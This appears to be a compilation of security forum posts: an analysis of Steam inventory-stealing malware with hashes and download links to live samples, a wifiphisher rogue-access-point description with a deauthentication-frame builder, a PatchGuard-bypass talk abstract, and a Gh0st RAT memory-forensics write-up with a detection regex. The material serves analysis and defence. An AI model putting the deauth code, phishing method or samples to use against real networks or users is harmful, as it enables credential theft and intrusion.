In the video it links to ‘csgoskinduplication[.]com’; this is the exact same website as ‘steamdouble[.]com’. The sample I grabbed back when I first saw this appear was not obfuscated or crypted. The current version available from the site has a crypted fake DLL which is decrypted and then run. This payload is the same one I will be showing in the further analysis, just packed/crypted. It seems that when the guy behind this first started, he didn’t care about packing/crypting his payload. The ‘SteamDouble.exe’ payload is written in C#. Throwing it in a tool like ILSpy gives us a nice set of source code files, especially because the author didn’t obfuscate any of the code. Just by looking at the project title ‘Stealer’ and the folder names inside the project like ‘SteamStealer’ it gives us a clear indication of what this sample does: The first folder named ‘Steam4NET’ contains a modified, stripped or old version of the Steam4NET open source .NET wrapper around the Steamworks C++ interfaces hosted on Github: https://github.com/SteamRE/Steam4NET Looking at the main function we see the first thing it does is download an image which is stored in the appdata folder and shown to the user: The image that is downloaded and displayed shows a screenshot of a Russian DOTA2 account with the items it has available. (The original message sent on Steam chat was an ‘image’ link, so this makes sense to hide its real purpose.) The downloaded image: The second part of the main function is where the actual ‘Steam stealing’ takes place: First it creates a new SteamWorker and adds an ‘offer’ which is used to trade items. The Steam cookies are parsed, and as long as there are Steam cookies (aka the user is logged in to Steam) it will perform the ‘Spam.SpamInFriendList’ function which contains the message which got me on the sample in the first place: “lol, wtf? http://img-pic[.]com/image612_14[.]jpeg”.
After this it adds the items it wants to steal, which is a long list of items this guy is interested in. The last step is where it actually sends the item to trade to his own account. On the other end the guy only has to accept the trade offers (or have some automated way of doing it) and the items will belong to him. Very simple but an effective way of stealing items. Going back to the original ‘addOffer’ function, if we look at the arguments it expects we can find who is behind this (or at least the account used for the malicious trading): The first argument to this function is the user’s Steam ID. This can be put in a SteamCommunity URL to go to the user’s profile. The URL for this is: ‘http://steamcommunity.com/profiles/<SteamID>/’; this will redirect to the user’s real ID. In this case the SteamID used is ‘76561198161815322’; if we put this in we get redirected to ‘Steam Community :: prewelec’. This is the profile of a guy going by the nickname ‘prewelec’ who is supposedly from the US: On the bottom the user commented some trade URLs with the ID and token; these are the same items used for the ‘addOffer’ function’s 2nd and 3rd argument. Looking at this user’s inventory it doesn’t show a very big amount of items, but it could be this is just a middle-man account used to trade the items further: Another interesting thing from this profile is the comments it leaves on some other gamer’s profile: The comment is pretty much the same message it spams around via the Steam chat ‘Spam.SpamInFriendList’ function. This sample stood out and appears to be a custom thing created by a criminal specifically for his needs. The other samples, however, did not match this sample, and not only in size.

The Steam Stealer Extreme service

From the 14 samples I obtained, the ‘SteamDouble’ sample stood out of the bunch due to its size. The other 13 are all around 250kb in size.
Throwing any of the 250kb and bigger samples into ILSpy gives us the same decompilation structure: This tells me it’s the same tool/stealer used in all of these samples. Looking at the functions inside the decompiled code we see similar functionality as with the ‘SteamDouble’ Stealer: It can gather the Steam cookie, add items to be stolen, post comments (on profile pages) to spread, and also has two functions indicating a spreading mechanism towards friends (be it Steam chat or profile comments): ‘SpreadToFriends’ and ‘SpreadToFriendsUsingChat’. Just by looking at these functions we get a clear picture of what this malware’s purpose is. The builder used for these samples does obfuscate some of the code, which causes some trouble for the decompiler. Of course it can be fixed, but seeing as the purpose of this thing is already clear I’m not going to waste time on cleaning all the samples. The more interesting question here is what ‘Steam Stealer Extreme’ is. By simply googling for it you can find the ‘sales’ website located at steamstealer[.]com, steamstealer[.]org and steamstealer[.]net. It has the title ‘Steam Stealer Extreme’ which is marketed as ‘Revolutionizing the Steam Item Stealing Industry’, erhm… yes. An about section details some more information on ‘the product’: Steam Stealer Extreme is the new Steam Stealer completely custom coded (you can PM us and get some proof if you want!) and functions well. Steam Stealer Extreme is not like other steam stealers which is based off the same code as found on the Russian forum where it was leaked. It has extra features like filters (which are properly coded) and spreading your file via commenting on the client’s friends’ profiles * NEW * Spreads Via Chat! We’re a no bullshit product with little disadvantages. Our stealer does work and will work until Steam decide to patch the methods used. Steam Stealer Extreme is about getting the items you want and when you want.
They also have some videos showing how it works on their YouTube channel: https://www.youtube.com/channel/UC7MjY8duE1xh-tTWpAsj_o The site also contains an image of the ‘builder’ for the stealer: A list of features for the stealer: Information on how to purchase ‘Steam Stealer Extreme’, which is currently only available via Bitcoin payment: And at the bottom there’s also some contact information: Looking at the registration date of the website, the .com, .org and .net websites for ‘Steam Stealer Extreme’ were registered on 2014-11-16 and all hosted on a VPS owned by OVH France at 92.222.189.92. The email address ‘brynaldo8’ in the contact section from the site is ‘brynaldo8@gmail.com’. Interestingly, if you simply google for this email address you will find the following pastebin post which contains a database dump with the (hashed) password for ‘LaPanthere’, which is the name this guy goes by: (Originally located at: LaPanthere SQL - Pastebin.com) The ‘LaPanthere’ guy also has a PasteBin account at LaPanthere's Pastebin - Pastebin.com: Combining ‘LaPanthere’ and ‘brynaldo8’ also shows a dump from a post by Brian Krebs about ‘ragebooter’ being hacked. The dump also contains the user details of ‘LaPanthere’ but with a hotmail.com email address instead of gmail.com: (Original dump located at: http://krebsonsecurity.com/wp-content/uploads/2013/08/ragebooter.txt) Finding this guy’s Steam profile is also easy; it actually matches the avatar from the PasteBin account. (Steam profile: Steam Community :: LaPanthere): This shows ‘LaPanthere’ is an Australian guy. I won’t go any further into this person’s identity as I’m not here to make personal allegations against someone. All I am going to say about it is that this person is rather sloppy with what he’s leaving behind as a trail. Finding out ‘LaPanthere’’s real identity is not that hard and only a few steps away from what I’ve shown.
I would expect a bit more from someone running a service like this, but keeping in mind his public profile(s) are on hackforums and leakforums, it says enough. As for the ‘Steam Stealer Extreme’ malware going around, just don’t start running everything being sent to you via chat messages or comments. Should you have your items stolen, send a message to the Valve support staff explaining your situation; they will be able to help you out. Detection wise, antivirus products are still somewhat behind on detecting this one properly but it’s getting there (slowly). All the samples I’ve shown are available for download from Malwr; see the next section for details and links to all the files, enjoy! Steam Stealer Extreme samples: Note: These are not all the Steam Stealer Extreme samples out there. These are just the ones I found when focusing on finding out what they were and where they came from back in November through December 2014. File name: Cracked SSE Builder.exe File size: 363.5 KB ( 372224 bytes ) First seen: 2014-11-25 MD5: 38569912bdd5e0f9d13d5e8b2c00800c SHA1: f153bf9d850f396e30f507d526a7a365ef93bdfd SHA256: 700c38b312e1404b5d488767e1f45171848af00d4232cf9c2338e76e7648eb59 ssdeep: 6144:ODrM4scvXCPGrLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhxd:ODr/sGXoT/dEWP3GxtJw4Mp VirusTotal: https://www.virustotal.com/en/file/700c38b312e1404b5d488767e1f45171848af00d4232cf9c2338e76e7648eb59/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/MWNkYWQwYmRjZGQ3NGUyNWJmZDY5ODA2YTgwOTQ3Nzc/ File name: CSGO Hack v1 - Coded by Empathy.exe File size: 355.0 KB ( 363520 bytes ) First seen: 2014-12-03 MD5: 99fd0d39b96009cd17a343d36e3f6c75 SHA1: 107090152ec18240064b035181a7a5220b7152d0 SHA256: 7b660ed6ecbe98591802d6547f75f133434e92f45fa4bd5b4b4053f2975ba050 ssdeep: 6144:45oNxrSsfjLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhxIkEFMa:4+NbC/dEWP3GxtJw4MfE VirusTotal: https://www.virustotal.com/en/file/7b660ed6ecbe98591802d6547f75f133434e92f45fa4bd5b4b4053f2975ba050/analysis/ Malwr (Downloadable sample):
https://malwr.com/analysis/YmEzYzBkOWNmYWIyNGEwZjgyOGYyMTdhMDljNGFjOGQ/ File name: CSGO Multi-Hack by LionHacks.exe File size: 499.0 KB ( 510976 bytes ) First seen: 2014-11-26 MD5: b1b8915930cd72ef8fac0b449b13f966 SHA1: 040461f0a9b1be066158caa50a21ae9d58a07e89 SHA256: 3508518052ff500ac1d4e4e72dea79844b38660178f45c41ecfe47fc9abcc339 ssdeep: 6144:0ZQel9dgZgdLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhxgL6ceixULxr9TBvctzF6WI:0ZQcdI1/dEWP3GxtJw4MApxuzkt0yij VirusTotal: https://www.virustotal.com/en/file/3508518052ff500ac1d4e4e72dea79844b38660178f45c41ecfe47fc9abcc339/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/ZWM1NTcxYWYwOWIwNDhlZGEwNTdjNWQzMWJlNTA4NDI/ File name: CsgoSound.exe File size: 282.2 KB ( 289002 bytes ) First seen: 2014-12-03 MD5: 4928ed30b0f9eee8078baa74dd0d7729 SHA1: 9b2689a6236d172499aa6019bf99c74dccb169e0 SHA256: 642a51ef3844cfe8389bf41b288ed42ce1c10998de142c5a4529929ed3d35e2c ssdeep: 6144:L0fzV71SinbLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhxwIkI:gzjS/dEWP3GxtJw4MEq VirusTotal: https://www.virustotal.com/en/file/642a51ef3844cfe8389bf41b288ed42ce1c10998de142c5a4529929ed3d35e2c/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/NjFkY2Q2OGM4OTBiNDNlNjhjMmMzYTY3Nzg0NmM5MDI/ File name: Easy Trader.exe File size: 445.0 KB ( 455680 bytes ) First seen: 2014-11-20 MD5: 4e29168df760a5577e61d0b6e9e05704 SHA1: 8f323230d114800d6aadc3dfa1abf045030ddc43 SHA256: b81fe9ec92388484fa5a8542aaa5f9206e50871f664158a3734d891b1e325147 ssdeep: 6144:uwAArfLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhx8mMbxuszfkOffcXF+cOr+9lPF:g/dEWP3GxtJw4MNMbxjdffgj VirusTotal: https://www.virustotal.com/en/file/b81fe9ec92388484fa5a8542aaa5f9206e50871f664158a3734d891b1e325147/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/MjM4NWNmMWI2YTg3NDdiMTgxYjcwYWJiOTc0MGUxYWU/ File name: ESAntiCheat.exe File size: 257.5 KB ( 263680 bytes ) First seen: 2014-11-25 MD5: 65a3f03dc222ae27cb38cf5ef737f92d SHA1: ebc1c3e230afa07b40a49b037a3e349907e04fa0 SHA256: 
f3abc0a2eaf9128833722e6db6c7e34b7228345a983991ba165f5eecb59d5141 ssdeep: 6144:RTfzI+RCaduLCrLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhx:RTblEB3/dEWP3GxtJw4M VirusTotal: https://www.virustotal.com/en/file/f3abc0a2eaf9128833722e6db6c7e34b7228345a983991ba165f5eecb59d5141/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/MzBiMDJlYmEwNTkwNDE0MDliMjdmNTdhMDcyZTRjOGE/ File name: HashChanger.exe File size: 544.0 KB ( 557056 bytes ) First seen: 2014-11-23 MD5: 732f303f34afa01e16fe3fc67a4e88ee SHA1: 7e26ddbf6e223ca17ffb9dd62831b5588ccd9b0d SHA256: c5e77e7b716c52bdd674e21e921d6b4a0bf09f5fd8d019c5e9e1835045124b65 ssdeep: 12288:58srPC/lUx539N3dPysQvxcRy1uvdy2jZZJAmnI/v:51b4qTzFDQvx65w2ymI VirusTotal: https://www.virustotal.com/en/file/c5e77e7b716c52bdd674e21e921d6b4a0bf09f5fd8d019c5e9e1835045124b65/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/MTllYWE2NzM4NWYwNGE1M2IyZDkxNjJmNjk2NjZmZmM/ File name: Knife Exploit.exe File size: 444.0 KB ( 454656 bytes ) First seen: 2014-11-29 MD5: 22d1eb7f6536b3873318ef143b11982b SHA1: 13514fcf49b5e40fbec16cff58ab328b70d1e9f0 SHA256: 87f9c7b0e3a00c3240be1a578c5340bd433182209df2ff8a9bae9f51f9c4d74a ssdeep: 6144:dnylhPXVLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhxl+WA1hzu8UYh:lyV0/dEWP3GxtJw4MR+Fr VirusTotal: https://www.virustotal.com/en/file/87f9c7b0e3a00c3240be1a578c5340bd433182209df2ff8a9bae9f51f9c4d74a/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/YWIyMGY0OWZhNTUyNDVjY2EyYjgxNTE1MmEzNDgzNDg/ File name: SSBuilder.exe File size: 619.0 KB ( 633856 bytes ) First seen: 2014-11-29 MD5: aad6c525784c7e9ede917c1d57fbf9fa SHA1: ede0c60b18ce52b6e50f7d18c3eccb27109cf79c SHA256: b2a1bfdc72a0b92b6ea510c98f2954ea94ecbab81eee13a7db379afb330c9d28 ssdeep: 6144:pXIa5sZuZTLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhxD4rrDBUYyMDEwk:pr5ssM/dEWP3GxtJw4MC VirusTotal: https://www.virustotal.com/en/file/b2a1bfdc72a0b92b6ea510c98f2954ea94ecbab81eee13a7db379afb330c9d28/analysis/ Malwr (Downloadable sample): 
https://malwr.com/analysis/NzgyYWNhN2I1ZjM4NGUwMDgzYTRkNjViNmYxYWMyOWI/ File name: SSE_Stealer_76561197960568995.exe File size: 253.0 KB ( 259072 bytes ) First seen: 2014-11-21 MD5: 05738a9c72ecea220dd668068b0d4a12 SHA1: 9d77843aaf9372cfb27978dd6c1034f77325edac SHA256: 3668b53bcb4f9031e585f58f01b638f2afe5e9e128a63994ee05e77a0f5e2ff4 ssdeep: 6144:tnFRpTJrYEYpsEzLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhx:tnFRpTJ1Y8/dEWP3GxtJw4M VirusTotal: https://www.virustotal.com/en/file/3668b53bcb4f9031e585f58f01b638f2afe5e9e128a63994ee05e77a0f5e2ff4/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/ZTBhNjBjZjc5NWUxNDdiYTg3YzE2Yjc5YjlhNWE2MTc/ File name: Steam Inventory Stealer - Builder.exe File size: 443.0 KB ( 453632 bytes ) First seen: 2014-11-21 MD5: 2f8b66e5ca6f4d569b05f7ebf9b41457 SHA1: b30351911491fcf8809c1e469c80f393c506ef1d SHA256: 4f6c96c12f72fbf6095fd8484f985d244d61b2153644430736e2d854790e644a ssdeep: 6144:v83x+y+eLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhx4MWwblGwsPtIGacnW:vx7/dEWP3GxtJw4McpgDsPrakW VirusTotal: https://www.virustotal.com/en/file/4f6c96c12f72fbf6095fd8484f985d244d61b2153644430736e2d854790e644a/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/MTQzMGIzYWNhYWYyNGNlNGI3NGM3ZTk0MTQ5ODkxOGY/ File name: SteamTradeHacker-v.3.6.exe File size: 257.0 KB ( 263168 bytes ) First seen: 2014-11-22 MD5: e834f7a3c508f24e29caf336e27d408d SHA1: 8874a35610d391a493f21618a01d79976f6a2ba5 SHA256: 737d7ac17382252ce0f7bf185e54675d42568057c23917d58189c1b8c0065478 ssdeep: 6144:GYLZOFDdMbLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhx:5ZCp/dEWP3GxtJw4M VirusTotal: https://www.virustotal.com/en/file/737d7ac17382252ce0f7bf185e54675d42568057c23917d58189c1b8c0065478/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/YjBmMGU5OWY2NTczNDZlNGIzYzE1MDYzYTAxY2ZjYjY/ File name: Stub.exe File size: 354.5 KB ( 363008 bytes ) First seen: 2014-11-29 MD5: dc88276de2ad28c7af2578e7f691b285 SHA1: 17bd2037abcc9a248cfb3e991be3e6e73bcfad18 SHA256: 
4016e2a60be405e610245db9a87c807354c51db557a49103520f69b280f338dc ssdeep: 6144:DIqY6P0o2WU0dLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhxtq4i3:cqYjocZ/dEWP3GxtJw4Mxq1 VirusTotal: https://www.virustotal.com/en/file/4016e2a60be405e610245db9a87c807354c51db557a49103520f69b280f338dc/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/N2YxZDU3M2M1YzdkNDIzOGE2Mjk3ZjQ0MGM3YjYwYjY/ Sursa: 0x3a - Security Specialist and programmer by trade - Analysis of Steam stealers and the ‘Steam Stealer Extreme’ service
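The sample listings above give MD5/SHA1/SHA256 digests for each file. For anyone triaging local copies, the same digests can be reproduced with Python's standard hashlib (ssdeep needs a third-party library and is skipped here; the file name is a placeholder):

```python
import hashlib

def hash_sample(data: bytes) -> dict:
    """Compute the same digests used in the sample listings above."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }

# Normally the bytes would come from disk:
#   data = open("Stub.exe", "rb").read()
digests = hash_sample(b"demo bytes")
print(sorted(digests))  # ['md5', 'sha1', 'sha256']
```

Comparing the resulting hex strings against the listings above is enough to confirm you are looking at the same sample.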
15. [h=1]Pin Tools[/h] I just decided to centralize my old and upcoming Pin tools about program analysis in this repo. [h=2]Timeline[/h] [TABLE] [TR] [TH=colspan: 2]Timeline[/TH] [/TR] [TR] [TH]Name[/TH] [TH]Date[/TH] [/TR] [TR] [TD]FormatStringDetection[/TD] [TD]Nov 11, 2014[/TD] [/TR] [TR] [TD]OverflowDetection[/TD] [TD]Oct 10, 2013[/TD] [/TR] [TR] [TD]ConcolicExecution[/TD] [TD]Aug 28, 2013[/TD] [/TR] [TR] [TD]InMemoryFuzzing[/TD] [TD]Aug 17, 2013[/TD] [/TR] [TR] [TD]LoopDetectionInstCounter[/TD] [TD]Aug 13, 2013[/TD] [/TR] [TR] [TD]ObsoleteStackFrameAccessDetection[/TD] [TD]Aug 08, 2013[/TD] [/TR] [TR] [TD]ClassicalUseAfterFreePatternMatching[/TD] [TD]Aug 08, 2013[/TD] [/TR] [TR] [TD]PointerWithoutCheckDetection[/TD] [TD]Aug 08, 2013[/TD] [/TR] [TR] [TD]TaintAnalysis[/TD] [TD]Aug 08, 2013[/TD] [/TR] [/TABLE] [h=2]Related blog post[/h]
FormatStringDetection – n/a
OverflowDetection – shell-storm | Stack and heap overflow detection at runtime via behavior analysis and PIN
ConcolicExecution – shell-storm | Binary analysis: Concolic execution with Pin and z3
InMemoryFuzzing – shell-storm | In-Memory fuzzing with Pin
LoopDetectionInstCounter – n/a
ObsoleteStackFrameAccessDetection – shell-storm | Taint analysis and pattern matching with Pin
ClassicalUseAfterFreePatternMatching – shell-storm | Taint analysis and pattern matching with Pin
PointerWithoutCheckDetection – shell-storm | Taint analysis and pattern matching with Pin
TaintAnalysis – shell-storm | Taint analysis and pattern matching with Pin
Sursa: https://github.com/JonathanSalwan/PinTools
16. [h=1]wifiphisher[/h] [h=2]About[/h] Wifiphisher is a security tool that mounts fast automated phishing attacks against WPA networks in order to obtain the secret passphrase. It is a social engineering attack that, unlike other methods, does not include any brute forcing. It is an easy way of obtaining WPA credentials. Wifiphisher works on Kali Linux and is licensed under the MIT license. From the victim's perspective, the attack unfolds in three phases:

1. Victim is deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.
2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.
3. Victim is served a realistic router config-looking page. Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade.

Performing MiTM attack Link: https://github.com/sophron/wifiphisher
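As a rough illustration of phase 1, the bytes of a single 802.11 deauthentication frame can be assembled by hand. This sketch only builds the frame; the MAC addresses are made up, and actually transmitting such frames requires a monitor-mode interface and a tool like Scapy or aireplay-ng, which is out of scope here:

```python
import struct

def build_deauth(dest: bytes, src: bytes, bssid: bytes, reason: int = 7) -> bytes:
    """Assemble an IEEE 802.11 deauthentication frame.
    Frame control 0x00C0 = management frame (type 0), subtype 12 (deauth)."""
    frame_control = b"\xc0\x00"
    duration = b"\x3a\x01"          # 314 microseconds, a common default
    seq_ctrl = b"\x00\x00"          # sequence control, left at zero
    return (frame_control + duration + dest + src + bssid +
            seq_ctrl + struct.pack("<H", reason))

client = b"\xaa\xbb\xcc\xdd\xee\xff"   # hypothetical client MAC
ap = b"\x11\x22\x33\x44\x55\x66"       # hypothetical AP MAC / BSSID
frame = build_deauth(client, ap, ap)
print(len(frame))  # 26: 24-byte management header + 2-byte reason code
```

Wifiphisher's jamming amounts to spraying frames like this in both directions (spoofing the AP to the client and the client to the AP) plus to the broadcast address, which is why clients keep dropping off the real network.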
17. Understanding and Defeating Windows 8.1 Kernel Patch Protection: It’s all about gong fu! (part 2)
Andrea Allievi
Talos Security Research and Intelligence Group - Cisco Systems Inc.
aallievi@cisco.com
November 20th, 2014 - NoSuchCon

Who am I
• Security researcher, focused on Malware Research
• Work for Cisco Systems in the TALOS Security Research and Intelligence Group
• Microsoft OSs Internals enthusiast / Kernel system level developer
• Previously worked for PrevX, Webroot and Saferbytes
• Original designer of the first UEFI Bootkit in 2012, and other research projects/analysis

Agenda
0. Some definitions
1. Introduction to Patchguard and Driver Signing Enforcement
2. Kernel Patch Protection Implementation
3. Attacking Patchguard
4. Demo time
5. Going ahead in Patchguard Exploitation

Download: http://www.nosuchcon.org/talks/2014/D2_01_Andrea_Allievi_Win8.1_Patch_protections.pdf
18. Hunting and Decrypting Communications of Gh0st RAT in Memory This blog post contains the details of detecting the encrypted Gh0st RAT communication, decrypting it and finding malicious Gh0st RAT artifacts (like process, network connections and DLL) in memory. I also present a Volatility (Advanced Memory Forensics Framework) plugin (ghostrat) which detects the encrypted Gh0st RAT communication, decrypts it and also automatically identifies the malicious Gh0st RAT process, its associated network connections and the loaded DLLs. This can help the digital forensic investigators and incident responders to quickly narrow down on the Gh0st RAT artifacts without having to spend time on the manual investigation. 1. Introduction Gh0st RAT is a Remote Access Trojan used in many cyber espionage/targeted attacks like "Gh0stnet", which targeted computer systems owned by the Private Office of the Dalai Lama and several other Tibetan enterprises. Gh0st RAT was also used to attack large corporations in the oil and gas industry, dubbed "Operation Night Dragon" by McAfee. This malware has multiple capabilities which allow the attackers to take control of the infected machine; some of them include screen control, keystroke logging, webcam eavesdropping, voice monitoring, and remote file downloads. More details of this malware can be found in the whitepaper titled "Know Your Digital Enemy". When a host is infected with Gh0st RAT, the malware collects the system information, encrypts the collected information and sends it to the C2 (command and control) server. In this blog I will show how this communication takes place and how this communication can be detected and decrypted in memory using a Volatility plugin. 2.
Network Communications of Gh0stRat An example of Gh0st RAT traffic is shown below. This traffic contains a 13-byte header: the first 5 bytes (called the magic header) are a keyword in clear text like 'Gh0st', and the rest of the bytes are encoded using the zlib compression algorithm (marked in green). Different variants use different magic headers, and some variants use magic headers longer than 5 bytes. Below screenshots show variants of Gh0st RAT using different magic headers. 3. Why a Volatility Plugin? There exists a Gh0st decode module in "chopshop" which can decrypt the Gh0st RAT communication from the packet capture (pcap), but while investigating a real incident there exist some challenges like:
a) The organization might not have a full packet capture solution
b) It is not possible to trace back the malicious process even if the packet capture (pcap) is available
c) It is not possible to trace back the malicious DLL using the packet capture
Memory forensics can help in overcoming these challenges, so I decided to write a Volatility plugin which could identify from the memory image the encrypted Gh0st RAT communication, decrypt it and also identify the malicious process, the network communications associated with that malicious process and the DLLs loaded by that malicious process. This can help the investigators and the incident responders to not only decrypt the malicious communication but also to quickly identify the malicious Gh0st RAT artifacts in an automated way. 4. Detecting Gh0st RAT manually using a memory image In this section I show the technique to detect the encrypted Gh0st RAT communication from the memory image manually using the Volatility advanced memory forensics framework. 4.1. Detecting Gh0st RAT network communication Even though the Gh0st RAT variants change the magic keyword, it still follows a pattern in its network communication which can be detected using the regular expression shown below.
/[a-zA-z0-9:]{5,16}..\x00\x00..\x00\x00\x78\x9c/ In order to detect this pattern in memory, Volatility’s yarascan plugin can be used against the memory image. The below screenshots show the encrypted traffic detected in kernel memory. Once the encrypted traffic is detected, it can then be decrypted. 4.2. Detecting the malicious Gh0st RAT process From an incident response perspective it is important to determine the malicious Gh0st RAT process. Once the network traffic is detected in memory, we can get the magic keyword from the network traffic (in this case Gh0st) and then look for the process that contains this magic keyword. The below screenshot shows the process (svchost.exe with pid 408) which contains the magic keyword (Gh0st). 5. Automating Gh0st RAT detection using a Volatility plugin In this section, I present a Volatility plugin (ghostrat), which automates the steps mentioned in section 4 by:
- Looking for the Gh0st RAT network traffic pattern in kernel memory
- Extracting the magic keyword from the detected pattern and decrypting the communication
- Determining the malicious process by searching for the magic keyword in user process memory
- Determining the network connections made by the malicious process
- Determining the DLLs loaded by the malicious process
The below screenshot shows the ghostrat Volatility plugin. This plugin can be downloaded from GitHub or from the Volatility Plugin Contest 2014. To use the plugin just copy it to the Volatility plugins directory. After copying the plugin, Volatility's plugin system will automatically register the plugin as shown below. 6. Detecting and decrypting multiple variants of Gh0stRat using the Volatility plugin In order to demonstrate the capabilities of the plugin, I analyzed multiple variants of Gh0stRat samples in the sandbox and collected the pcap and the memory image. The below screenshot shows the pcaps and the memory images (.vmem files) of three different Gh0stRat samples.
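Before moving to the samples, the header layout and the regular expression above can be made concrete with a small sketch that fabricates a Gh0st-style packet and decodes it with Python's zlib (the layout follows the description above: 5-byte magic, two little-endian DWORD lengths, then a zlib stream starting 0x78 0x9c; the payload string is made up):

```python
import re
import struct
import zlib

def build_packet(magic: bytes, payload: bytes) -> bytes:
    compressed = zlib.compress(payload)   # default level -> 0x78 0x9c header
    total = len(magic) + 8 + len(compressed)
    return magic + struct.pack("<II", total, len(payload)) + compressed

def decode_packet(packet: bytes):
    magic = packet[:5]
    total, uncompressed_len = struct.unpack("<II", packet[5:13])
    return magic, zlib.decompress(packet[13:total])

# the same pattern fed to yarascan above
pattern = re.compile(rb"[a-zA-z0-9:]{5,16}..\x00\x00..\x00\x00\x78\x9c", re.DOTALL)

pkt = build_packet(b"Gh0st", b"fake system info")
print(bool(pattern.search(pkt)))   # True: the fabricated packet matches
print(decode_packet(pkt))          # (b'Gh0st', b'fake system info')
```

The `\x00\x00` runs in the pattern simply assume both length DWORDs stay under 65536, which holds for the small beacon packets shown in the screenshots.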
The first two samples were run on Windows XP SP3 and the third sample was run on Win7SP0x86. 6.1. Investigating the first sample (Gh0st.vmem and Gh0st.pcap) The below screenshot shows the Gh0stRat communication. In this case the infected host 192.168.1.100 (which is the Windows XP machine where the sample was run) is sending the encrypted traffic to the C2 (192.168.1.2, which is my Linux machine acting as C2) on port 2011; also in this case the magic keyword "Gh0st" was sent in the first 5 bytes. After running the plugin against the memory image (Gh0st.vmem), it detected the encrypted traffic in memory and decrypted it; it also detected the malicious process as svchost.exe (with pid 408). In the decrypted traffic shown below, the system information is passed to the command and control server. The value shown in blue (05 00 00 00), which should be read as 00 00 00 05 (because of the little-endian format), is the major version of the operating system, which is 5. The value shown in green (01 00 00 00), which should be read as 00 00 00 01, is the minor version of the operating system, which is 1. So looking at these two values we can tell which OS was infected. In this case it is 5.1, which is Windows XP. The value shown in yellow (28 0a 00 00), which should be read as 00 00 0a 28, is the build number of the operating system, which in decimal is 2600. This is the build number of Windows XP. From the decrypted communication it can be seen that the Service Pack (service pack 3) and the Hostname (in this case "myhostname") of the infected machine are also passed to the attacker. The Volatility plugin was able to automatically detect svchost.exe (with pid 408) as the malicious process. The plugin also detected the malicious network communication associated with svchost.exe (with pid 408). The below screenshot also shows the connection to the IP 192.168.1.2 on port 2011 (this is the same traffic captured in the pcap).
This can help investigators quickly determine the C2 IP involved in the compromise.

svchost.exe is a legitimate OS process whose job is to load DLLs running as services, so there is a possibility that svchost.exe loaded a malicious DLL. It is important from an incident response perspective to find that malicious DLL. Once the malicious process is identified, the plugin also lists all the DLLs loaded by it, which can help investigators quickly pinpoint a malicious DLL. The below screenshot shows the suspicious file loaded by svchost.exe (pid 408). After dumping this suspicious file from memory and submitting it to VirusTotal, antivirus vendors detect it as Magania/Farfli, which is the same as Gh0st RAT.

6.2. Investigating the second sample (HEART.vmem and HEART.pcap)

The below screenshot shows the Gh0st RAT communication with 192.168.1.2 on port 2013; in this case the magic keyword "HEART" was sent in the first 5 bytes.

After running the plugin against the memory image (HEART.vmem), it detected the encrypted traffic in memory and decrypted it; it also identified the malicious process as Garss.exe (pid 124). The plugin also detected the malicious communication to the IP 192.168.1.2 on port 2013 (that we saw in the pcap) associated with Garss.exe (pid 124), and it listed all the DLLs loaded by the malicious process. From the below screenshot it can be seen that a malicious DLL is loaded by the process (Garss.exe).

6.3. Investigating the third sample - Windows 7 image (win7_cb1st.vmem and win7_cb1st.pcap)

The below screenshot shows the Gh0st RAT communication with 192.168.1.3 on port 8000; in this case the magic keyword "cb1st" was sent in the first 5 bytes.

After running the plugin against the Windows 7 memory image (win7_cb1st.vmem), it detected the encrypted traffic in memory and decrypted it; it also identified the malicious process as svchost.exe (pid 840).
Based on the major and minor versions and the build number (highlighted in blue, green and yellow) in the decrypted traffic, it can be determined that the infected OS is Windows 7 and that the hostname of the infected machine is "win7-sandbox".

The plugin also detected the malicious communication to the IP 192.168.1.3 on port 8000 (that we saw in the pcap) associated with svchost.exe (pid 840), and it listed all the DLLs loaded by the malicious process. From the below screenshot it can be seen that a malicious DLL is loaded by the process (svchost.exe).

This blog post explained the details of Gh0st RAT communication and showed a method to detect it manually using the Volatility advanced memory forensics framework. I also presented a plugin that detects the malicious process, network communication and loaded DLLs, and decrypts the network communication of multiple variants of Gh0st RAT in an automated way. This allows incident responders/investigators to quickly detect the malicious Gh0st RAT artifacts and the C2 IP, and it also helps in determining the type of information that was exchanged between the infected host and the C2 server.

Thanks to the core developers of Volatility for their encouragement, for being an inspiration and for authoring one of the best books I have read last year and for many years to come, "The Art of Memory Forensics": Michael Ligh (@iMHLv2), Andrew Case (@attrc), Jamie Levy (@gleeda) and Aaron Walters (@4tphi). Special thanks to Michael Ligh for going through my content and suggesting changes (in spite of his busy schedule) and for suggesting that I submit the plugin to the Volatility Plugin Contest 2014.

Posted by Monnappa KA

Sursa: Malware Forensics Research Blog: Hunting and Decrypting Communications of Gh0st RAT in Memory
